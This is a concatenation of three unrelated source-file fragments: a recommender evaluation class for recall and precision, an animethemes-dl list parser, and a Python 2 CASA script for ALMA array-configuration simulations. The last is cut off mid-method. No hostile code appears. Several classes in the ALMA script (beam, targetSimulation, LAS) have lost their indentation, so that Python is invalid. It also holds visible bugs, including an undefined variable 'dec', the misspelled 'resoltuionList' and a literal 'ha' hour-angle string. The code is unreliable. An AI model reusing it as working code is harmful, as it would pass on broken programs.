            if len(self.rating_GroupForUser_TEST[u]) > 0 and len(self.rating_GroupForUser_TRAIN[u]) > 0:
                test_set.append(u)
        # avg = 0
        # for i in self.rating_GroupForUser_TRAIN:
        #     avg += len(self.rating_GroupForUser_TRAIN[i])
        # print(avg/len(self.rating_GroupForUser_TRAIN))
        # exit()
        return test_set
    # TODO add new one
    # here ...
    #TODO old one
    def predict_in_matrix(self, user_id, top_m) -> None:
        """Compute in-matrix recall and precision for a given user, then add them to the sum"""
        ratings = np.dot((self.shp[user_id] / self.rte[user_id]), self.mu.T)
        actual_TRAIN = self.rating_GroupForUser_TRAIN[user_id]
        actual_TEST = self.rating_GroupForUser_TEST[user_id]
        sorted_ratings = np.argsort(-ratings)
        # With assume_unique=True, np.setdiff1d keeps the order of its first
        # argument, so the rating ranking is preserved after dropping cold items.
        predicted_top_M_TRAIN = np.setdiff1d(sorted_ratings, self.cold_items_TRAIN, assume_unique=True)[:top_m]
        predicted_top_M_TEST = np.setdiff1d(sorted_ratings, self.cold_items_TEST, assume_unique=True)[:top_m]
        top_m_correct_TRAIN = np.sum(np.in1d(predicted_top_M_TRAIN, actual_TRAIN) * 1)
        top_m_correct_TEST = np.sum(np.in1d(predicted_top_M_TEST, actual_TEST) * 1)
        self.recalls_in_matrix_TRAIN += (top_m_correct_TRAIN / len(self.rating_GroupForUser_TRAIN[user_id]))
        self.precisions_in_matrix_TRAIN += (top_m_correct_TRAIN / top_m)
        self.recalls_in_matrix_TEST += (top_m_correct_TEST / len(self.rating_GroupForUser_TEST[user_id]))
        self.precisions_in_matrix_TEST += (top_m_correct_TEST / top_m)
    # TODO old one
    # def predict_out_of_matrix(self, user_id, top_m) -> None:
    #     """Compute out-of-matrix recall and precision for a given user, then add them to the sum"""
    #     ratings = np.dot((self.shp[user_id] / self.rte[user_id]), self.mu.T)
    #     actual_TRAIN = self.rating_GroupForUser_TRAIN[user_id]
    #     actual_TEST = self.rating_GroupForUser_TEST[user_id]
    #     predicted_top_M = np.argsort(-ratings)[:top_m]
    #     top_m_correct_TRAIN = np.sum(np.in1d(predicted_top_M, actual_TRAIN) * 1)
    #     top_m_correct_TEST = np.sum(np.in1d(predicted_top_M, actual_TEST) * 1)
    #     self.recalls_out_of_matrix_TRAIN += (top_m_correct_TRAIN / len(self.rating_GroupForUser_TRAIN[user_id]))
    #     self.precisions_out_of_matrix_TRAIN += (top_m_correct_TRAIN / top_m)
    #     self.recalls_out_of_matrix_TEST += (top_m_correct_TEST / len(self.rating_GroupForUser_TEST[user_id]))
    #     self.precisions_out_of_matrix_TEST += (top_m_correct_TEST / top_m)
    # TODO new one
    def predict_out_of_matrix(self, user_id, top_m) -> None:
        """Compute out-of-matrix recall and precision for a given user, then add them to the sum"""
        ratings = np.dot((self.shp[user_id] / self.rte[user_id]), self.mu.T)
        actual_TRAIN = self.rating_GroupForUser_TRAIN[user_id]
        actual_TEST = self.rating_GroupForUser_TEST[user_id]
        sorted_ratings = np.argsort(-ratings)
        # For TEST, items the user already rated in TRAIN are excluded from
        # the ranking (order preserved, see note in predict_in_matrix).
        predicted_top_M_TEST = np.setdiff1d(sorted_ratings, self.rating_GroupForUser_TRAIN[user_id], assume_unique=True)[:top_m]
        predicted_top_M_TRAIN = sorted_ratings[:top_m]
        top_m_correct_TRAIN = np.sum(np.in1d(predicted_top_M_TRAIN, actual_TRAIN) * 1)
        top_m_correct_TEST = np.sum(np.in1d(predicted_top_M_TEST, actual_TEST) * 1)
        self.recalls_out_of_matrix_TRAIN += (top_m_correct_TRAIN / len(self.rating_GroupForUser_TRAIN[user_id]))
        self.precisions_out_of_matrix_TRAIN += (top_m_correct_TRAIN / top_m)
        self.recalls_out_of_matrix_TEST += (top_m_correct_TEST / len(self.rating_GroupForUser_TEST[user_id]))
        self.precisions_out_of_matrix_TEST += (top_m_correct_TEST / top_m)
    def avg_recall_precision(self) -> None:
        for top in range(self.TOP_M_start, self.TOP_M_end):
            # make all metrics zero for new iteration
            print(f"Top-M: {top}")
            self.recalls_in_matrix_TRAIN, self.precisions_in_matrix_TRAIN = 0, 0
            self.recalls_out_of_matrix_TRAIN, self.precisions_out_of_matrix_TRAIN = 0, 0
            self.recalls_in_matrix_TEST, self.precisions_in_matrix_TEST = 0, 0
            self.recalls_out_of_matrix_TEST, self.precisions_out_of_matrix_TEST = 0, 0
            if self.pred_type == "both":
                # NOTE(review): this branch only appends the TRAIN averages,
                # although the predict_* calls also accumulate *_TEST sums;
                # plot() with pred_type="both" then plots empty TEST lists.
                for usr in self.test_set:
                    self.predict_in_matrix(usr, top)
                    self.predict_out_of_matrix(usr, top)
                self.avg_recalls_in_matrix_TRAIN.append(self.recalls_in_matrix_TRAIN / len(self.test_set))
                self.avg_precisions_in_matrix_TRAIN.append(self.precisions_in_matrix_TRAIN / len(self.test_set))
                self.avg_recalls_out_of_matrix_TRAIN.append(self.recalls_out_of_matrix_TRAIN / len(self.test_set))
                self.avg_precisions_out_of_matrix_TRAIN.append(self.precisions_out_of_matrix_TRAIN / len(self.test_set))
            elif self.pred_type == "in-matrix":
                for usr in self.test_set:
                    self.predict_in_matrix(usr, top)
                self.avg_recalls_in_matrix_TRAIN.append(self.recalls_in_matrix_TRAIN / len(self.test_set))
                self.avg_precisions_in_matrix_TRAIN.append(self.precisions_in_matrix_TRAIN / len(self.test_set))
                self.avg_recalls_in_matrix_TEST.append(self.recalls_in_matrix_TEST / len(self.test_set))
                self.avg_precisions_in_matrix_TEST.append(self.precisions_in_matrix_TEST / len(self.test_set))
            elif self.pred_type == "out-of-matrix":
                for usr in self.test_set:
                    self.predict_out_of_matrix(usr, top)
                self.avg_recalls_out_of_matrix_TRAIN.append(self.recalls_out_of_matrix_TRAIN / len(self.test_set))
                self.avg_precisions_out_of_matrix_TRAIN.append(self.precisions_out_of_matrix_TRAIN / len(self.test_set))
                self.avg_recalls_out_of_matrix_TEST.append(self.recalls_out_of_matrix_TEST / len(self.test_set))
                self.avg_precisions_out_of_matrix_TEST.append(self.precisions_out_of_matrix_TEST / len(self.test_set))
    def plot(self) -> None:
        """Save recall/precision vs. Top-M curves to <folder>/FIGURE.png."""
        if self.pred_type == "both":
            r_i_TRAIN, p_i_TRAIN = self.avg_recalls_in_matrix_TRAIN, self.avg_precisions_in_matrix_TRAIN
            r_o_TRAIN, p_o_TRAIN = self.avg_recalls_out_of_matrix_TRAIN, self.avg_precisions_out_of_matrix_TRAIN
            r_i_TEST, p_i_TEST = self.avg_recalls_in_matrix_TEST, self.avg_precisions_in_matrix_TEST
            r_o_TEST, p_o_TEST = self.avg_recalls_out_of_matrix_TEST, self.avg_precisions_out_of_matrix_TEST
        elif self.pred_type == "in-matrix":
            r_TRAIN, p_TRAIN = self.avg_recalls_in_matrix_TRAIN, self.avg_precisions_in_matrix_TRAIN
            r_TEST, p_TEST = self.avg_recalls_in_matrix_TEST, self.avg_precisions_in_matrix_TEST
        elif self.pred_type == "out-of-matrix":
            r_TRAIN, p_TRAIN = self.avg_recalls_out_of_matrix_TRAIN, self.avg_precisions_out_of_matrix_TRAIN
            r_TEST, p_TEST = self.avg_recalls_out_of_matrix_TEST, self.avg_precisions_out_of_matrix_TEST
        # PLOT recall graph
        plt.ioff()  # Turn interactive plotting off
        fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(9, 4))
        if self.pred_type == "both":
            ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_i_TRAIN, label="in-matrix-train")
            ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_o_TRAIN, label="out-of-matrix-train")
            ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_i_TEST, label="in-matrix-test")
            ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_o_TEST, label="out-of-matrix-test")
        else:
            ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_TRAIN, label="train")
            ax1.plot(range(self.TOP_M_start, self.TOP_M_end), r_TEST, label="test")
        ax1.set_xlabel('Top-M', fontsize=11)
        ax1.set_ylabel('Recall', fontsize=11)
        ax1.set_title(f"Sample size: {self.sample_test}")
        ax1.legend()
        # PLOT precision graph
        if self.pred_type == "both":
            ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_i_TRAIN, label="in-matrix-train")
            ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_o_TRAIN, label="out-of-matrix-train")
            ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_i_TEST, label="in-matrix-test")
            ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_o_TEST, label="out-of-matrix-test")
        else:
            ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_TRAIN, label="train")
            ax2.plot(range(self.TOP_M_start, self.TOP_M_end), p_TEST, label="test")
        ax2.set_xlabel('Top-M', fontsize=11)
        ax2.set_ylabel('Precision', fontsize=11)
        ax2.set_title(f"Sample size: {self.sample_test}")
        ax2.legend()
        # plot configs
        ax1.grid()
        ax2.grid()
        plt.subplots_adjust(wspace=0.3, left=0.1, right=0.95, bottom=0.15)
        fig.suptitle(f'{self.pred_type} predictions', fontsize=14)
        plt.savefig(f'./{self.folder}/FIGURE.png')
        # plt.show()
|
"""
Parses data from myanimelist/anilist and themes.moe.
"""
from typing import List
from animethemes_dl.options import OPTIONS
import logging
from ..models.animethemes import AnimeThemeAnime
from .anilist import get_anilist
from .animethemes import fetch_animethemes
from .myanimelist import get_mal
logger = logging.getLogger('animethemes-dl')
def get_animethemes(username: str, anilist: bool=False, **animelist_args) -> List[AnimeThemeAnime]:
    """
    Fetches a user's animelist (myanimelist.net by default, anilist.co when
    `anilist` is true), optionally slices it according to
    OPTIONS['animelist']['range'], and resolves it against themes.moe.
    Extra keyword arguments are forwarded to the animelist fetcher.
    """
    fetch_list = get_anilist if anilist else get_mal
    animelist = fetch_list(username, **animelist_args)
    span = OPTIONS['animelist']['range']
    if any(span):
        start, end = span
        animelist = animelist[start:end or None]
    return fetch_animethemes(animelist)
if __name__ == "__main__":
    # Manual smoke test: pretty-print the resolved themes for a sample user.
    from pprint import pprint
    pprint(get_animethemes('sadru'))
|
#!/usr/bin/python
"""
Classes to create a complete report of an array configuration with the plots+report.
First it will create the necessary simulations. Then the missing plots+reports
INPUT:
- Antenna List (casa format)
- Band List : nominal frequencies for each band will be defined
- Type of report: Complete, Normal, Fast (to be clearly defined)
(Not Yet Implemented)
HISTORY:
2011.04.03:
- Definition of the program with the classes.
2011.04.04:
- Report class
2011.04.17:
- Add the Shadowing class
2011.04.18:
- fixing curveShadowingDeclination. Ideally we don't want cleaning but only the UV-coverage.
- plotShadowingDeclination (+pickle)
2011.05.05:
- Adding the figures class
2011.11.04:
- adding the class ArrayConfigurationCasaFile
2011.11.06:
- move the class ArrayConfigurationCasaFile to the file arrayConfigurationFile
2012.03.05:
- Fix bug in curveShadowDeclination for CASA 3.3
- Add a method to simulate an image with various components (Gaussian or Disk)
2012.04.04:
- Add method to analyze the UV-coverage between different array configurations
2012.04.11:
- Add filtering class for the simulation
2012.04.19:
- Modify filtering class to have a larger mapsize and to use the new tasks that replace simdata (simobserve, simanalyze)
2012.05.17:
- modify filtering to use a uniform disk rather than a Gaussian
2012.05.24:
- add the beam class to analyze it
2012.08.27:
- add hourAngle parameter to the Shadowing method.
2012.11.14:
- Adding the LAS measurement (at 100 GHz) to the curveBeamResolutionDeclination method
2013.06.09:
- adapting arrayConfigurationReport to CASA 4.0.1
2013.06.22:
- Adding LAS class to compute it in function of disk size...
2013.07.02:
- adapt radialDensityArrayConfigurations to CASA 4.0.1
2014.11.07:
- Adding the script to the AIV CVS
2014.11.08:
- Important : spatial resolution is computed with Briggs
2015.07.27:
- Update the curveFluxDiskSize
2015.10.08:
- change the LAS definition (MRS) using L05 definition from SCIREQ-328
IMPORTANT : if MRS_new > MRS_old we keep MRS_old
2016.03.08:
- change the mask definition in the LAS class.
2016.03.09:
- improve LAS class (setting, mapsize, etc)
RUN:
CASA> : sys.path.insert(0,'/home/stephane/git/ALMA/ALMA/ArrayConfiguration/')
"""
__authors__="ALMA: SL"
__version__="0.6.2@2016.03.09"
import UVW as uvw
import beamAnalysis as ba
import math, string
import numpy as np
import os
import pickle
from casa import componentlist as cl
# import simdata as sim
import pylab as pl
from casa import image as ia
from casa import regionmanager as rg
import simanalyze as sa
import simobserve as so
import imstat as ims
import arrayConfigurationTools as aT
RAD2ARCSEC = 206264.9  # arcseconds per radian (rounded; exact ~206264.806)
# execfile('UVW.py')
# execfile('BeamAnalysis.py')
# ALMA band number -> nominal observing frequency (see module docstring).
band={'3':'100GHz','6':'230GHz','7':'345GHz','9':'675GHz'}
class filtering:
    """
    Simulation of Gaussian Beams (from R. Indebetouw)
    """
    def __init__(self):
        pass
    def runFiltering(self,antennaCfg,trackDuration,frequency,dec,imageTotalSize,resolutionStart,resolutionEnd,resolutionStep):
        """
        use the disk100.fits image of a uniform disk of 100 pixel size (diameter)
        Run a set of simulations to account for the filtering at different scales.
        antennaCfg: antenna configuration file
        trackDuration : trackDuration
        resolutionStart,resolutionEnd,resolutionStep: range for the resolution to simulate
        dec: declination
        OUTPUT:
        resolution, flux: resolution and flux output (1 Jy in entry)
        """
        maskClean = [70,70,180,180]
        projectName="tempCurveFiltering"
        # NOTE(review): math.floor returns a float on Python 2; np.arange /
        # np.zeros accept it here, but newer NumPy deprecates float sizes.
        nStep=math.floor((resolutionEnd-resolutionStart)/resolutionStep)
        resolutionArr=np.arange(nStep)*resolutionStep+resolutionStart
        flux=np.zeros(nStep)
        boxStat = '%d,%d,%d,%d'%(maskClean[0],maskClean[1],maskClean[2],maskClean[3])
        # Remove leftovers from any previous run of this simulation project.
        os.system("rm -Rf *%s*"%(projectName))
        # Build the J2000 direction string for the requested declination.
        if dec <= -10:
            decString="J2000 10h00m00s %3dd00m00s"%(dec)
        elif dec<0 and dec>-10:
            decString="J2000 10h00m00s -0%1dd00m00s"%(-dec)
        elif dec>=0 and dec < 10 :
            decString="J2000 10h00m00s +0%1dd00m00s"%(dec)
        elif dec >=10:
            decString="J2000 10h00m00s +%2dd00m00s"%(dec)
        # simulation with one arcsec component
        ##os.system("rm -Rf *%s*"%(projectName))
        print decString
        index=0
        print resolutionArr
        for res in resolutionArr:
            # Pixel scale such that the 100-pixel disk spans `res` arcsec.
            resolutionDisk = "%4.2farcsec"%(res/100.)
            print resolutionDisk
            print antennaCfg
            # NOTE(review): called sim_observe/sim_analyze here but
            # simobserve/simanalyze elsewhere in this file — confirm which
            # attribute names exist in the imported CASA task modules.
            so.sim_observe(
                project = projectName+"%d"%(index),
                skymodel = 'disk100.fits',
                inbright = '1Jy/pixel',
                indirection = decString ,
                incell = resolutionDisk,
                incenter = frequency,
                inwidth = '8GHz',
                antennalist = antennaCfg,
                totaltime = trackDuration,
                integration = '10s',
                direction = decString,
                maptype = 'ALMA',
                # mapsize = ['2arcmin','2arcmin'],
                # pointingspacing = "2arcmin"
            )
            sa.sim_analyze(
                project=projectName+"%d"%(index),
                image = True ,
                imsize = imageTotalSize,
                # cell = cellsize,
                mask = maskClean,
                niter = 2000,
                threshold = '0.1mJy',
                graphics = 'file'
            )
            imageName=projectName+"%d/"%(index)+projectName+"%d.%s.image"%(index,antennaCfg.split('.')[0])
            # imageName=projectName+"%d/"%(index)+projectName+"%d.image"%(index)
            print "Read %s"%(imageName)
            ia.open(imageName)
            # flux0=ia.statistics()['flux'][0]
            stat = ims.imstat(
                imagename = imageName,
                box = boxStat ,
            )
            flux0 = stat['flux'][0]
            print flux0
            # Normalise fluxes to the first (finest) resolution point.
            if res == resolutionArr[0]:
                fluxNormalization = flux0
            fluxRes = flux0/fluxNormalization
            print "Flux: %4.3f"%(fluxRes)
            flux[index] = fluxRes
            ia.close()
            index += 1
        return(resolutionArr,flux)
class beam:
"""
Class to analyze the properties of the beam
"""
def __init__(self):
pass
def curveBeamResolutiongDeclination(self,antennaCfg,trackDuration,declinationMin,declinationMax,decStep, ha = 'transit'):
"""
Compute the minor,Major axis vs. Declination for a given configuration
antennaCfg: antenna configuration
trackDuration: time duration, e.g. "6h"
declinationMin,declinationMax: range of declination
decStep: step for the declination, needs to be an integer...
Output : arrays [declination] [minor] [major]
"""
projectName="tempCurveBeamDeclination"
nStep=math.floor((declinationMax-declinationMin)/decStep)
decArr=np.arange(nStep)*decStep+declinationMin
minorAxis = np.zeros(nStep)
majorAxis = np.zeros(nStep)
las100 = np.zeros(nStep)
index=0
# simulation with one arcsec component. We clean the old files.
os.system("rm -Rf *%s*"%(projectName))
for dec in decArr:
if dec <= -10:
decString="J2000 0h00m00s %3dd00m00s"%(dec)
elif dec<0 and dec>-10:
decString="J2000 0h00m00s -0%1dd00m00s"%(-dec)
elif dec>=0 and dec < 10 :
decString="J2000 0h00m00s +0%1dd00m00s"%(dec)
elif dec >=10:
decString="J2000 0h00m00s +%2dd00m00s"%(dec)
# simulayion with one arcsec component
#os.system("rm -Rf *%s*"%(projectName))
print decString
#cl.done()
cl.addcomponent(dir=decString, flux=1,freq='100GHz',shape="Gaussian",majoraxis="0.1arcsec",minoraxis="0.1arcsec",positionangle="0deg")
cl.rename(projectName+"%d.cl"%(index))
cl.done()
print projectName+"%d.cl"%(index)
so.simobserve(
project=projectName+"%d"%(index),
complist=projectName+"%d.cl"%(index),
compwidth = '8GHz',
antennalist=antennaCfg,
totaltime=trackDuration,
integration = '10s',
hourangle = 'ha'
)
sa.simanalyze(
project=projectName+"%d"%(index),
image = True ,
weighting = 'briggs',
# imsize = 256,
# cell = cellsize,
# mask = maskClean,
niter = 100,
# threshold = '0.1mJy',
# graphics = 'file'
)
psfName= projectName+"%d/"%(index)+projectName+"%d.%s.psf"%(index,antennaCfg.split('.')[0])
psfQuickName = projectName+"%d/"%(index)+projectName+"%d.%s.quick.psf"%(index,antennaCfg.split('.')[0])
msName = projectName+"%d/"%(index)+projectName+"%d.%s.ms"%(index,antennaCfg.split('.')[0])
imageName = projectName+"%d/"%(index)+projectName+"%d.%s.noisy.image"%(index,antennaCfg.split('.')[0])
# if os.path.exists(psfName):
# psfRes = psf.psf_calc(psfName)
# else:
# psfRes = psf.psf_calc(psfQuickName)
ia.open(imageName)
data = ia.restoringbeam()
ia.close()
print data
minorAxis[index] = data['minor']['value']
majorAxis[index] = data['major']['value']
print "minor Axis:",minorAxis[index]
print "major Axis:",majorAxis[index]
ms = uvw.UVW(msName)
dUV = ms.distUV(noShadow = True)
duvMin = min(dUV)
rds = np.sort(dUV)
nuv = len(rds)
i05 = (int)(0.05 * nuv)
L05 = rds[i05]
las = RAD2ARCSEC * 0.0017987547479999 / duvMin ## 0.6 * Lambda / BL_min
## Definition of LAS from SCIREQ-328
las100[index] = RAD2ARCSEC * 0.983296 * 0.0029979245799998332 / L05
# if las100[index] > las :
# las100[index] = las
# las100[index] = las
print "mininum BL:",duvMin
print "L05:",L05
print "LAS (old definition)",las
print "LAS (100 GHz):",las100[index]
index+=1
# fout=open("curveBeamDec.last","wb")
# data={'Dec':decArr,'Shadow':fractionShadowing}
# pickle.dump(data,fout)
# fout.close()
return(decArr,minorAxis,majorAxis,las100)
class UVcoverage:
    """
    Class to produce the UVcoverage plots and the derived densities, to provide
    """

    def __init__(self):
        pass

    def radialDensityArrayConfigurations(self,arrayNameList,totalTimeList,Rmin,Rmax,Nbin,dec):
        """
        Return the radial UV-density for different arrays with a total time of integration for each array
        INPUT:
        arrayNameList : list of the array to be analyzed.
        totalTimeList:List of total time of integration for each array
        Rmin,Rmax,Nbin: minimum, maximum, bin number for the radius. (common)
        dec: Declination of the source.
        OUTPUT:
        (rad, dens): the radius bins and one radial density array per configuration.
        """
        # Build the J2000 direction string with explicit sign/zero padding.
        if dec <= -10:
            decString="J2000 0h00m00s %3dd00m00s"%(dec)
        elif dec<0 and dec>-10:
            decString="J2000 0h00m00s -0%1dd00m00s"%(-dec)
        elif dec>=0 and dec < 10 :
            decString="J2000 0h00m00s +0%1dd00m00s"%(dec)
        elif dec >=10:
            decString="J2000 0h00m00s +%2dd00m00s"%(dec)
        projectName = "tempUVcoverage"
        # Remove leftovers from previous runs of this helper.
        os.system("rm -Rf *%s*"%(projectName))
        # 10" Gaussian test component, 1 Jy at 100 GHz (shared by all arrays).
        cl.addcomponent(dir=decString, flux=1.,freq='100GHz',shape="Gaussian",majoraxis="10arcsec",minoraxis="10arcsec",positionangle="0deg")
        cl.rename(projectName+".cl")
        cl.done()
        indexTime = 0
        dens = []
        for arrayName in arrayNameList:
            print "Configuration: %s \n"%(arrayName)
            # Each configuration uses its own total integration time.
            trackDuration = totalTimeList[indexTime]
            so.simobserve(
                project = projectName,
                complist = projectName+".cl",
                compwidth = '8GHz',
                antennalist = arrayName,
                totaltime = trackDuration,
                integration = '10s',
                )
            # The MS name embeds the configuration file stem.
            msName=projectName+"/"+projectName+".%s.ms"%(arrayName.split('.')[0])
            uv = uvw.UVW(msName)
            rad, rhouv = uv.radialDensity(Rmin,Rmax,Nbin)
            dens.append(rhouv)
            indexTime += 1
        return (rad, dens)
class targetSimulation:
"""
Class to provide image of a real object seen with the current Array Configuration
"""
def __init__(self):
self.source = 0.
def buildImageWithComponentList(self,nameComp,resolutionList,maxSize,xyStep,sh='Gaussian',fluxList=[]):
""" Input List:
minRes,maxRes : minimum,maximum of the components
nComp : number of components
"""
RAString="J2000 0h00m"
DecString="-30d00m"
xStep = 30.-maxSize/2.
yStep = 30.+maxSize/2.
dStep = xyStep
if len(fluxList) != len(resolutionList):
fluxList=np.zeros(len(resoltuionList),np.int)
fluxList[:]=1.
indexSource=0
for resolution in resolutionList:
xStep+=dStep
if xStep > 30.+maxSize/2.:
xStep=30.-maxSize/2.
yStep-=dStep
fluxSource=fluxList[indexSource]
indexSource+=1
posString="%s0%3.1fs"%(RAString,xStep/15.)+" %s%3.1fs"%(DecString,yStep)
print posString, "%5.2farcsec resolution"%(resolution)
cl.addcomponent(dir=posString, flux=fluxSource,freq='100GHz',shape=sh,majoraxis="%5.2farcsec"%(resolution),minoraxis="%5.2farcsec"%(resolution),positionangle="0deg")
cl.rename(nameComp)
cl.done()
class LAS:
"""
Class to study the LAS for a given configuration
"""
def __init__(self):
pass
def curveFluxDiskSize(self,antennaCfg, trackDuration, sizeMin, sizeMax, sizeStep, declination, cellsize = '0.2arcsec',
hourAngle='transit', shapeCL = 'Gaussian', threshClean = '0mJy'):
"""
Compute the flux of disk with different size
antennaCfg: antenna configuration
trackDuration: time duration, e.g. "6h"
sizeMin,sizeMax: range of the disk size in arcsec. The total flux is 1 Jy
sizeStep: step for the disk size
declination: disk declination
cellsize : size of the cell
Output: array [sizeDisk, flux]
"""
## setting simobserve
projectName="tempDiskFlux"
nStep = int((sizeMax-sizeMin) / sizeStep)
sizeArr = np.arange(nStep)*sizeStep + sizeMin
flux = np.zeros(nStep)
size = np.zeros(nStep)
las100 = np.zeros(nStep)
totalSize = 120.
mapSize = "%3.1farcsec"%(totalSize)
cellF = float(cellsize[:-6]) ## to be improved ....
imagesize = int(totalSize/cellF)
index=0
print "image size: %d "%(imagesize)
print "mapsize :%s"%(mapSize)
# simulation with one arcsec component. We clean the old files.
os.system("rm -Rf *%s*"%(projectName))
if declination <= -10:
decString="J2000 0h00m00s %3dd00m00s"%(declination)
raDisk = "0h00m00s"
decDisk = "%3dd00m00s"%(declination)
elif declination < 0 and dec>-10:
decString="J2000 0h00m00s -0%1dd00m00s"%(-declination)
raDisk = "0h00m00s"
decDisk = "-0%1d00m00s"%(declination)
elif declination >=0 and dec < 10 :
decString="J2000 0h00m00s +0%1dd00m00s"%(declination)
raDisk = "0h00m00s"
decDisk = "+0%1d00m00s"%(declination)
elif declination >=10:
decString="J2000 0h00m00s +%2dd00m00s"%(declination)
raDisk = "0h00m00s"
decDisk = "+0%2d00m00s"%(declination)
## Estimation of the spatial resolution at 100 GHz for the mask
arrCfg = aT.ArrayInfo(antennaCfg)
arrCfg.stats()
maxBL = arrCfg.maxBl
resEstimated = 61800. / (maxBL * 100.)
print("Estimated RES: %3.2f"%(resEstimated))
for disksize in sizeArr :
#cl.done()
cl.addcomponent(dir=decString, flux=1. , freq='100GHz',shape= shapeCL,majoraxis= "%2.2farcsec"%(disksize),minoraxis="%2.2farcsec"%(disksize),positionangle="0deg")
cl.rename(projectName+"%d.cl"%(index))
cl.done()
print projectName+"%d.cl"%(index)
so.simobserve(
project = projectName+"%d"%(index),
complist = projectName+"%d.cl"%(index),
compwidth = '8GHz',
antennalist = antennaCfg,
totaltime = trackDuration,
integration = '10s',
mapsize = mapSize ,
user_pwv = 0. ,
)
maxDisk = max(disksize, resEstimated )
regDiskClean = 'circle[[%s , %s], %3.1farcsec ]'%(raDisk,decDisk, maxDisk * 1.5)
regDiskFlux = 'circle[[%s , %s], %3.1farcsec ]'%(raDisk,decDisk, maxDisk * 1.5)
sa.simanalyze(
project=projectName+"%d"%(index),
image = True ,
weighting = 'briggs',
imsize = imagesize,
cell = cellsize,
mask = regDiskClean,
niter = 2000,
threshold = threshClean,
imdirection = decString ,
# graphics = 'file'
)
msName = projectName+"%d/"%(index)+projectName+"%d.%s.ms"%(index,antennaCfg.split('.')[0])
imageName = projectName+"%d/"%(index)+projectName+"%d.%s.noisy.image"%(index,antennaCfg.split('.')[0])
print(" ")
print("## analysis ...")
print "Mask Clean :: %s"%(regDiskClean)
print "Mask Flux :: %s"%(regDiskFlux)
print "Component Size :: %2.2f"%(disksize)
ia.open(imageName)
data = ia.restoringbeam()
bmaj = data['major']['value']
stat = ia.statistics (region = regDiskFlux)
flux[index] = stat['flux']
ia.close()
print data
ms = uvw.UVW(msName)
dUV = ms.distUV(noShadow = True)
duvMin = min(dUV)
las100[index] = RAD2ARCSEC * 0.0017987547479999 / duvMin ## 0.6 * Lambda / BL_min
print "mininum BL:",duvMin
print "LAS (100 GHz & min BL):",las100[index]
print "Flux: %2.3f"%(flux[index])
print "--"
index+=1
return([sizeArr,flux])
class Shadowing:
    """
    Class for computing shadowing properties
    """

    def __init__(self):
        pass

    def curveShadowingDeclination(self,antennaCfg,trackDuration,declinationMin,declinationMax,decStep,hourAngle = 'transit'):
        """
        Compute the shadowing fraction vs. Declination for a given configuration
        antennaCfg: antenna configuration
        trackDuration: time duration, e.g. "6h"
        declinationMin,declinationMax: range of declination
        decStep: step for the declination, needs to be an integer...
        hourAngle: hour angle forwarded to simobserve (default 'transit')
        Output : array [declination,fraction of shadowing]
        Side effect: pickles the curve to "curveShadowingDec.last".
        """
        projectName="tempCurveShadowingDeclination"
        nStep=math.floor((declinationMax-declinationMin)/decStep)
        decArr=np.arange(nStep)*decStep+declinationMin
        fractionShadowing=np.zeros(nStep)
        index=0
        # Simulation with one component per declination. Clean the old files.
        os.system("rm -Rf *%s*"%(projectName))
        for dec in decArr:
            # Build the J2000 direction string with explicit sign/zero padding.
            if dec <= -10:
                decString="J2000 0h00m00s %3dd00m00s"%(dec)
            elif dec<0 and dec>-10:
                decString="J2000 0h00m00s -0%1dd00m00s"%(-dec)
            elif dec>=0 and dec < 10 :
                decString="J2000 0h00m00s +0%1dd00m00s"%(dec)
            elif dec >=10:
                decString="J2000 0h00m00s +%2dd00m00s"%(dec)
            print decString
            # 10" Gaussian test component, 1 Jy at 100 GHz.
            cl.addcomponent(dir=decString, flux=1,freq='100GHz',shape="Gaussian",majoraxis="10arcsec",minoraxis="10arcsec",positionangle="0deg")
            cl.rename(projectName+"%d.cl"%(index))
            cl.done()
            print projectName+"%d.cl"%(index)
            so.simobserve(
                project=projectName+"%d"%(index),
                complist=projectName+"%d.cl"%(index),
                compwidth = '8GHz',
                antennalist=antennaCfg,
                totaltime=trackDuration,
                integration = '10s',
                hourangle = hourAngle,
                )
            print "Read %s%d.ms"%(projectName,index)
            # MS name embeds the configuration file stem.
            antList=string.split(antennaCfg,'.')
            msName=projectName+"%d/"%(index)+projectName+"%d.%s.ms"%(index,antList[0])
            print msName
            # Fraction of visibilities flagged as shadowed in the MS.
            vis=uvw.UVW(msName)
            ii,shad=vis.shadowing()
            fractionShadowing[index]=shad
            print "Shadowing fraction: %2.2f"%(shad)
            index+=1
        # Persist the latest curve so it can be re-plotted without re-simulating.
        fout=open("curveShadowingDec.last","wb")
        data={'Dec':decArr,'Shadow':fractionShadowing}
        pickle.dump(data,fout)
        fout.close()
        return(decArr,fractionShadowing)

    def plotShadowingDeclination(self,declination,shadowing):
        "Plot the shadowing fraction vs. the declination (also saved as PNG)"
        pl.clf()
        pl.plot(declination,shadowing)
        pl.plot(declination,shadowing,'o')
        pl.xlabel("Declination (Degree)")
        pl.ylabel("Shadowing (%)")
        pl.savefig("Shadowing-Declination.png")
        pl.show()
class figures:
    """
    Class to produce different plots
    """

    def __init__(self):
        pass

    def arrayConfig(self,fileCfg,xmin,xmax,ymin,ymax,title="",auto=False,savefig = None):
        """
        Plot the antenna positions of a configuration file, centered on the
        barycenter of the layout.
        fileCfg: configuration file for the Array
        xmin,xmax,ymin,ymax: plot ranges
        title: title in the plot
        auto: if True, derive the ranges from the data (overrides x/y limits)
        savefig: NOTE(review): currently unused — the figure is only shown,
        never saved; confirm whether this should trigger pl.savefig.
        """
        xx=[]
        yy=[]
        zz=[]
        name=[]
        f=open(fileCfg)
        dump=f.readline()
        res=dump.split()
        while dump !="":
            # Skip comment lines whose first token is exactly "#"; other
            # lines are expected as: x y z <pad?> name ...
            # NOTE(review): a blank line or a comment written "#foo" (no
            # space) would break this parser — confirm the file format.
            if res[0] != "#":
                xx.append(res[0])
                yy.append(res[1])
                zz.append(res[2])
                name.append(res[4])
            dump=f.readline()
            res=dump.split()
            print res
        f.close()
        # Re-center the layout on its barycenter.
        xa=np.array(xx,np.float)
        ya=np.array(yy,np.float)
        xmean=xa.mean()
        ymean=ya.mean()
        xa-=xmean
        ya-=ymean
        if auto :
